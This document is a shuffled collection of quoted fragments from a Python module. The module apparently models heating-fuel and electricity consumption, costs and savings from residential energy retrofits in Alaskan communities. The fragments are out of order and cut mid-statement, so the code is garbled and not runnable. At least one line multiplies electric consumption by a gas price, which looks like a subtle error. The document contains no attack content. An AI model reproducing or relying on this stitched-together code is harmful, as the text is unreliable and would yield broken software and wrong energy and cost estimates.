Cost Baseline\": b_NG_cost, \"Residential: Heating Natural", "(Mcf/year) Consumption Baseline\", \"Residential: Heating Natural 
Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating", ": np.array baseline cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices", "self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price", "+\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by", "consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption -", "b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year)", "---------- opportunity_HH : int Houses that can be retrofit savings_HF : float savings", "= \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' )", "Forecast forecast for a community diagnostics : diagnostics, optional diagnostics for tracking error/warning", "estimates the potential improvements to heating efficiency of residential buildings (homes). 
Consumption and", "amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year)", "\"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\",", "from the total consumption Parameters ---------- fuel_amnt: float % of fuel used total_consumption", "Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year)", "as a percentage of the pre-retrofit consumption, and the forecasted price of offset", "\"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\":", "tag[1] != 'residential': self.was_run = False self.reason = \"Not a residential project.\" return", "(HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler", "the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings =", "__init__ (self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters", "pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type. 
Attributes", "self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost", "fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total consumption Parameters", "* HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords", "component body ------------------------------------- \"\"\" import numpy as np from pandas import DataFrame import", "r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price", "Parameters ---------- fuel_amnt: float % of fuel used total_consumption : float total consumption", "np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area", "NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of", "\"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\",", "(cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year)", "r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost =", "Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized", "community. 
Initial value: 'Residential Buildings' section of community_data See also -------- aaem.community_data :", "Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\",", "natural gas fuel consumption savings_LP : float savings in propane consumption savings_kWh :", "self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of project(actual", "costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\"", "Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg", "r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year)", "gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price", "---------- scalers : dictionary of valid scalers, optional Scalers to adjust normal run", "Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\",", "## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH", "Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood", "percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"])", "Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\":", "information on Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object", "self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF 
self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler", "= self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost", "Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating", "Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating", ": dictionary of components, optional prerequisite component data this component has no prerequisites", "module estimates the potential improvements to heating efficiency of residential buildings (homes). Consumption", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year)", "np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI", "\\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption *", "Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption =", "self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption =", "self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\"", "self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost =", "#~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the", "* LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = 
self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf", "constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \"", "percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar", "r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year)", "self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv", "for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH :", "estimating future values initial value: forecast cd : dictionary general data for a", "def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption :", "proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed", "Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec,", "= False self.reason = \"Not a residential project.\" return # needed for electric", "for a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline values \"\"\"", "b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost", "community_data comp_specs : dictionary component specific data for a 
community. Initial value: 'Residential", "self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"])", "percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) /", "costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels per year", "component specific data for a community. Initial value: 'Residential Buildings' section of community_data", "COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item(", "(Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel", "Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg.", "= \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption)", "self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name,", "# coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a", "aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics", "costs. 
Attributes ---------- capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs", "(Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential:", "= 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF =", "cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural", "per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price", "Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential:", "Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential:", "kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction", "= np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. 
EUI Reduction\"]) total =", "Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass", "electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd =", "- self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption -", "r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost =", "Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost", ": CommunityData CommunityData Object for a community forecast : Forecast forecast for a", ") #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate", "+\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\", "/ 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt =", "percentage of the pre-retrofit consumption, and the forecasted price of offset heating fuels.", "[mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh)", "fuels. The cost to retrofit each home is also calculated. 
Parameters ---------- community_data", "float conversion factor Returns ------- float: fuel consumed for a type of fuel", "self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run = False", "self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"])", "Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\" tag =", "Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post", "fname = fname.replace(\" \",\"_\") # save to end of project(actual lifetime) df.ix[:self.actual_end_year].to_csv(fname, index_label=\"year\")", "Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost,", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel", "household (kWh/year). >= 6000 \"\"\" # 500 average energy use, 12 months in", "households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def", "= b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption *", "capital costs. 
\"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+')", "+= amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~", "[\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas =", "[mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP)", "\"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of project(actual lifetime) df.ix[:self.actual_end_year].to_csv(fname,", "np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf)", "no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average", "kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print", "calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that can", "year. That's where the 6000.0 # comes from. 
con_threshold = self.comp_specs['min kWh per", "Returns ------- float the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life]", "= con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh", "new diagnostics object forecast : forecast community forecast for estimating future values initial", "the first year of the project Attributes ---------- init_HH : int estimated households", "the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the difference", "the component output csv in directory Parameters ---------- directory : path output directory", "df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\")", "= self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price", "Attributes ---------- run : bool True in the component runs to completion, False", "of valid scalers, optional Scalers to adjust normal run variables. 
See note on", "float total consumption for residential buildings HH : float a # of houses", "price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF)", "self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv in directory Parameters", "self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of", "heating oil consumption init_wood : float initial heating cordwood consumption init_gas : float", ": np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption", "Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\",", "consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption", "= np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption", "0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt,", "= COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\", "years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\", "#HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = 
np.float64( self.opportunity_HH )", "b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price", "Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(),", "electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity per year", "* gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def", "= self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price']", "+ df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname", "s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption", "np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+", "was negative, setting to 0\" ) ## % as decimal #~ self.percent_savings =", "HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost", "# needed for electric or HF component and has a default value self.calc_avg_consumption()", "self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption", "and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual", "Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of", "households for first year of project \"\"\" val = 
self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total", "rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~", "\"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post", "heating savings created by the project Attributes ---------- annual_heating_savings : np.array heating savings", "= self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost :", "consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data']", "Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\":", "Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt", "\"\"\"calculate annual heating savings created by the project Attributes ---------- annual_heating_savings : np.array", "component data this component has no prerequisites leave empty Attributes ---------- diagnostics :", "\"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential:", "total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\", "- HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption", "dictionary of components, optional prerequisite component data this component has no prerequisites leave", "b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post 
Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year)", "COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy", "\"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast", "households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH", "EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption =", "consumption savings_wood : float savings in heating cordwood consumption savings_gas : float savings", "self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\",", "\"\"\"calculate the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array", ": np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel", "np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~", "#~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords)", "identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH *", "total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP =", "np.array baseline propane consumption 
baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array", "* \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] )", "self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64(", "import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import", "Levelized Cost of Energy, and Internal Rate of Return will all be calculated.", "Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df =", "self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost", "(self): \"\"\"Calculate the capital costs. 
Attributes ---------- capital_costs : float total cost of", "Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural", "base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate", "Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\":", "Initial value: 'Residential Buildings' section of community_data See also -------- aaem.community_data : community", "Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net", "+\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of", "(\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH", "Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost", "kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost", "electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption()", "Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost", "* \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption", "area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler", "Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", 
\"Residential: Heating", "(self): \"\"\"Get the average monthly consumption of electricity for a house. Attributes ----------", "refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"],", "\\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH", "self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post", "forecast cd : dictionary general data for a community. Initial value: 'community' section", "[mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save", "Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential", "this component has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for", "self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel", "\"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years,", "- r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG", ">= 6000 \"\"\" # 500 average energy use, 12 months in a year.", "EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = 
